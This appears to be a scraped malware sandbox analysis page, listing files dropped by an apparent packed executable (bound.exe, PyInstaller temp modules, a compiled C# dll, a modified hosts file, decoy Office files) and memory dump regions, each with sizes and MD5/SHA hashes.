00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\select.pyd

Filesize
24KB

MD5
062f0a9179c51d7ed621dac3dd222abd

SHA1
c7b137a2b1e7b16bfc6160e175918f4d14cf107c

SHA256
91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453

SHA512
b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\sqlite3.dll

Filesize
606KB

MD5
dcc391b3b52bac0f6bd695d560d7f1a9

SHA1
a061973a5f7c52c34a0b087cc918e29e3e704151

SHA256
762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859

SHA512
42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38242\unicodedata.pyd

Filesize
294KB

MD5
26f7ccda6ba4de5f310da1662f91b2ba

SHA1
5fb9472a04d6591ec3fee7911ad5b753c62ecf17

SHA256
1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60

SHA512
0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whwhyp34.d1h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
8.6MB

MD5
c99dcb9b5ed556b14ab282f5da84a674

SHA1
b2114bf9dfc1647c1c3c0af5a4724dfb748381bd

SHA256
53da84e0976854568cf9f638e21d439bf7f34bc0da5107dbf2836fb58780c8f0

SHA512
e3127a87a6eb9f4fab659bd89c3c47707d6abff1f09878c9f2f0927bf8a458a292f7e81f5ad18deafbe6966aa25258cac313784b9b24fe2494785f42517182bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfsmpej1\jfsmpej1.dll

Filesize
4KB

MD5
d055eecacc0a46d68a236392f675cac2

SHA1
65ad9f6d30784a5697360fd62374d7915104123d

SHA256
a2efd08767903d117e258d7153105dfe73e4b8a4a4a33501bd2f9162cd380058

SHA512
230f907c49b2c59d13b5525898435bdb50a62a006bedf155bbd3b8f72301c0a47608e957636e3968a78dc73257ca933d225c47031fd5c7cf966567dcfc6e26a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\AddInstall.docx

Filesize
17KB

MD5
96a4f69dcd11797a9373f01bb9cbc093

SHA1
75f46ea7345ebb349801860e9f60d19d6aa51c20

SHA256
c968315a4bb2443b72d3ab314402926a21b7013a3db5b1b46b8f2f806b18fd95

SHA512
93fc13ad23d808500c77731518b37ed0858c108585fad3effc8e206d8c24b1f4ae36d82709879fa819127875554489f37dd73c274374a0fdb7d89b4d83a1a315

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\ConfirmStop.xlsx

Filesize
10KB

MD5
d181cc1a4df3b03d3ec8cd1ea2e230fc

SHA1
f334f78096263e550ae281230e3e4aedb04b3b2c

SHA256
6546943246edfee255abf3aa15f038285b424186ee2f32cac3f8e350398b19f6

SHA512
5cb81dae8ee4234155af0a17629035b2220fc3c19022db0b4c89412d6f05271bf598e6a2e1b5630d5a0fcd1733dbeecc4e24a11734ad6be7d3606ce5a8ee40ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\ExitStep.xlsx

Filesize
10KB

MD5
1ba944e0e112763b10bb445c11c9e18b

SHA1
f777e787ae21e272e0d997a392a51be41fb2dcc3

SHA256
992e7d2aa2284d469158cb5d0a330aecc252455169f49f2023a07cdbf247ffdb

SHA512
14cd8066ba240af53145e062110ac7c92683dfd1f4b87ddae55b72a8ffe9d9e7437b6c7339214b48fac746aa7dc7aa1e4d9cc0a53462ae27cfbdc1c50aae2e09

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\ExpandConvertFrom.xlsx

Filesize
10KB

MD5
2f8d9f863022b290d519481f95b50e5c

SHA1
5881dde68bd288ba7740bd126e00a3646ebd6bdd

SHA256
6caf91f831ee00702d3f1902d12a755e992c543d3bce098e3fcac3458feb0689

SHA512
55b49a4a0cf2ecb8f498c434ac163e4a623c4d3eefe40d93d62a6524fc6ff3aa6d7b62268ffa0c505077fcd261fedddf4ebae5b51f04f42c632fe80fdda58add

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\LockCompare.docx

Filesize
14KB

MD5
d4ae4d84a68cef8850e558a075669411

SHA1
51b19dd4dc0beee75e5c40f2336ef4eb50df30c3

SHA256
21f50ad39c87842b95231e675beb7ba941b085b4e8529ddf951d0da07e517cf7

SHA512
3267a2eed3884bc6d1a611df9e686984954f05ed358cb2c86bb4ac48272653446c6c41835477c4852f490f40857ffe6cf49566d09b9c15cb36c07694fb524dd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\MeasureUnlock.xlsx

Filesize
13KB

MD5
d1a280f0d5fdb77b73d9d66e2511cb5e

SHA1
ba23400ba7ff47043fb7210bf70eac565b48822b

SHA256
eef502124edd166a13036f9c322bd19a3f43ae5ed843acceca9cb385c79d6e22

SHA512
6661b23c568584f8b6a94b071fb33975ed48edcb9b830f33ca70d1914f760dd89359d95ec5a3ef88bcf58bdf9aad22f10f6549bd660d5159f5b168515811cf93

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\SwitchDeny.xlsx

Filesize
9KB

MD5
11fe80065c20e47d7895622824bf47b9

SHA1
7b810c88574d7f39f07b875dae2646db53b82de6

SHA256
dc014f847f2d7f03650a659d724be285b165eaed2c4422d884c1fb32ec64f339

SHA512
94f5dd776aa4e504eb26969ae1871a1e7a25f9e64025a95e6d18de7a9707fb29f0eaf0a8abe2e30c37cc2aa5296c2407c5796b7632f3984320cf853c86ec87e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\ClearOpen.docx

Filesize
722KB

MD5
ec4358e6c34d7e0f27c2b1721045d1d3

SHA1
b5a96835de70fbe54c756902d3d16fbefaba8806

SHA256
70ee8da67d9abd88677c9bb255a942e978abccdd17a7e34af363a55cc866efa1

SHA512
f38fb134a5b6ed2d0153be5261ad33162b50906b28a2ff3a684f09c30aebc8f6dc5b81f3c86b986d3fe34bcd4160503729764a0bcd57e1eb39b64a21059b1d64

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jfsmpej1\CSC43A19DF3B077442594B99D14352648C6.TMP

Filesize
652B

MD5
d784c50e8027a923a95d49e423644958

SHA1
589997e7a8b9118b7f947d66c50b23c625d5a839

SHA256
c30fb7106fbc5329a6d78f66bb5218a33d28e347da14e649ed9ec283b7acce04

SHA512
956b7f5a923b1fb64695d8cc36590996cdd9948201a942356dfc503bc97587ce072a200d070194da416dc2594e904b5650f2417f882f4994956936288858e2f1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jfsmpej1\jfsmpej1.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jfsmpej1\jfsmpej1.cmdline

Filesize
607B

MD5
3e848f9539549c02fc4a3c9912db7f9b

SHA1
afb305e959c7b83f9456a14b36718ec11a583440

SHA256
cc86db0128e4028e5712bf1d6ff30af63d87e162032dc9154935ccd6699faf83

SHA512
b7d3eb3f1d11955044a298124db81c3cd2e30f7638b3433cf5e9a2a6ed1211b4ed3f43bfbabcee3a7bebfa4b7ba8eb6754385b79306e645fe0a59cda25ed023b

Download Submit
memory/812-31-0x00007FF828C10000-0x00007FF828C34000-memory.dmp

Filesize
144KB

Download
memory/812-74-0x000001D82D580000-0x000001D82D8F5000-memory.dmp

Filesize
3.5MB

Download
memory/812-66-0x00007FF827C10000-0x00007FF827C1D000-memory.dmp

Filesize
52KB

Download
memory/812-285-0x00007FF827C10000-0x00007FF827C1D000-memory.dmp

Filesize
52KB

Download
memory/812-60-0x00007FF823D80000-0x00007FF823DA3000-memory.dmp

Filesize
140KB

Download
memory/812-26-0x00007FF815190000-0x00007FF815779000-memory.dmp

Filesize
5.9MB

Download
memory/812-138-0x00007FF8234B0000-0x00007FF823620000-memory.dmp

Filesize
1.4MB

Download
memory/812-58-0x00007FF827A40000-0x00007FF827A59000-memory.dmp

Filesize
100KB

Download
memory/812-214-0x00007FF823C40000-0x00007FF823C59000-memory.dmp

Filesize
100KB

Download
memory/812-348-0x00007FF815190000-0x00007FF815779000-memory.dmp

Filesize
5.9MB

Download
memory/812-72-0x00007FF815190000-0x00007FF815779000-memory.dmp

Filesize
5.9MB

Download
memory/812-85-0x00007FF827A40000-0x00007FF827A59000-memory.dmp

Filesize
100KB

Download
memory/812-56-0x00007FF823E70000-0x00007FF823E9D000-memory.dmp

Filesize
180KB

Download
memory/812-86-0x00007FF823010000-0x00007FF82312C000-memory.dmp

Filesize
1.1MB

Download
memory/812-33-0x00007FF82D610000-0x00007FF82D61F000-memory.dmp

Filesize
60KB

Download
memory/812-68-0x00007FF823C10000-0x00007FF823C3E000-memory.dmp

Filesize
184KB

Download
memory/812-333-0x00007FF815190000-0x00007FF815779000-memory.dmp

Filesize
5.9MB

Download
memory/812-62-0x00007FF8234B0000-0x00007FF823620000-memory.dmp

Filesize
1.4MB

Download
memory/812-125-0x00007FF823D80000-0x00007FF823DA3000-memory.dmp

Filesize
140KB

Download
memory/812-297-0x00007FF823C10000-0x00007FF823C3E000-memory.dmp

Filesize
184KB

Download
memory/812-79-0x00007FF823A50000-0x00007FF823A64000-memory.dmp

Filesize
80KB

Download
memory/812-81-0x00007FF823E70000-0x00007FF823E9D000-memory.dmp

Filesize
180KB

Download
memory/812-82-0x00007FF823D50000-0x00007FF823D5D000-memory.dmp

Filesize
52KB

Download
memory/812-78-0x00007FF82D610000-0x00007FF82D61F000-memory.dmp

Filesize
60KB

Download
memory/812-73-0x00007FF823270000-0x00007FF823328000-memory.dmp

Filesize
736KB

Download
memory/812-64-0x00007FF823C40000-0x00007FF823C59000-memory.dmp

Filesize
100KB

Download
memory/812-75-0x00007FF814C20000-0x00007FF814F95000-memory.dmp

Filesize
3.5MB

Download
memory/812-76-0x00007FF828C10000-0x00007FF828C34000-memory.dmp

Filesize
144KB

Download
memory/812-309-0x00007FF823270000-0x00007FF823328000-memory.dmp

Filesize
736KB

Download
memory/812-310-0x000001D82D580000-0x000001D82D8F5000-memory.dmp

Filesize
3.5MB

Download
memory/812-312-0x00007FF814C20000-0x00007FF814F95000-memory.dmp

Filesize
3.5MB

Download
memory/812-339-0x00007FF8234B0000-0x00007FF823620000-memory.dmp

Filesize
1.4MB

Download
memory/812-334-0x00007FF828C10000-0x00007FF828C34000-memory.dmp

Filesize
144KB

Download
memory/2044-235-0x000001E6AA2B0000-0x000001E6AA2B8000-memory.dmp

Filesize
32KB

Download
memory/4328-96-0x000001D6C6600000-0x000001D6C6622000-memory.dmp

Filesize
136KB

Download